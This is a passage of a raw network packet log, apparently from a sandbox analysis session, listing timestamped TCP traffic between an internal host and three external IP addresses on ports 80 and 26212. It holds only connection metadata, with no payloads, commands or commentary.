Sep 27, 2024 04:21:16.306976080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306991100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.306996107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307002068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307015896 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307017088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307041883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307054996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307066917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307076931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307086945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307090044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307107925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307120085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307133913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307145119 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307167053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307236910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307248116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307265043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307276011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307285070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307290077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307324886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307324886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307342052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307353020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307380915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307396889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307406902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307406902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307442904 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307466030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307477951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307488918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307499886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307502985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307512045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307527065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307533026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307533026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307558060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307581902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307656050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307667017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307677031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307688951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307708025 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307739973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307796001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307806969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307822943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307832003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307842016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307846069 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307853937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307868958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307877064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307913065 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307913065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307924032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307935953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307966948 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.307986975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.307986975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.308001041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.308028936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.308033943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.308039904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.308053017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.308058023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.308080912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.308080912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.308115959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.308126926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.308150053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.308150053 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.308183908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.313976049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.313994884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314004898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314045906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314053059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314095974 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314095974 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314097881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314110041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314165115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314165115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314193964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314205885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314217091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314229012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314249039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314251900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314251900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314290047 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314321995 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314332008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314342976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314357042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314366102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.314376116 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314408064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.314438105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.332604885 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:16.337503910 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337522030 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337541103 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337551117 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337558985 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337627888 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337636948 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337647915 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337745905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337800026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337810993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337827921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337831020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.337837934 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337846994 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337858915 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337862968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.337862968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.337871075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337883949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337883949 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.337923050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.337923050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.337961912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337971926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.337980032 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337984085 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.337994099 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.338004112 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.338006020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.338013887 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:16.338027000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.338205099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.339427948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.339447975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.339459896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.339490891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.339490891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.339540958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.339553118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.339564085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.339576006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.339586020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.339586020 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.339678049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.340785980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340836048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340847969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340857029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.340914965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340925932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340928078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.340928078 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.340944052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340955019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.340975046 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.340981007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340993881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.340995073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.341006041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.341021061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.341047049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.341047049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.341059923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.341073036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.341083050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.341094017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.341105938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.341105938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.341126919 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.341141939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.341146946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.341180086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.344060898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344080925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344090939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344125986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344125986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344147921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344199896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344212055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344218969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344255924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344259024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344259024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344269037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344301939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344301939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344424963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344481945 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344578981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344588995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344605923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344623089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344635963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344639063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344639063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344646931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344664097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344671011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344672918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344695091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344727039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344727039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344774008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344785929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344820976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344826937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344826937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344834089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344857931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344868898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344875097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344875097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344881058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344894886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.344904900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344904900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344924927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.344959021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.345696926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345740080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345750093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345761061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.345782995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.345803976 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.345810890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345822096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345833063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345844984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345854998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.345866919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.345866919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.345896006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346081018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346092939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346107960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346146107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346146107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346191883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346204042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346214056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346225023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346236944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346256018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346256018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346350908 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346385002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346419096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346427917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346450090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346450090 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346476078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346494913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346506119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346517086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346527100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346534967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346539021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346565008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346579075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346579075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346611023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346622944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346622944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346659899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346659899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346780062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346791983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346847057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346858025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346868992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346879005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346889973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346889973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346889973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346934080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346934080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.346972942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.346992016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.347024918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.347033978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.347033978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.347035885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.347047091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.347078085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.347078085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.347100973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.355104923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.355127096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.355138063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.355207920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.355230093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.355242968 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.355254889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.355267048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.355331898 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.355331898 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.355333090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.370580912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.370594025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.370604992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.370667934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.370678902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.370678902 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.370690107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.370702982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.370753050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.370753050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.370753050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.374310970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374324083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374335051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374352932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374362946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374373913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374387026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374419928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374419928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374459982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.374495983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374506950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374516964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374535084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374546051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.374552965 CEST	49725	80	192.168.2.5	185.215.113.117
